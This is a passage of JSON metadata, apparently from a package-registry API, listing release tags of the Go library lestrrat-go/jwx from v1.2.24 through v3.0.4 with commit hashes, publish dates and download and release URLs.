%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https:/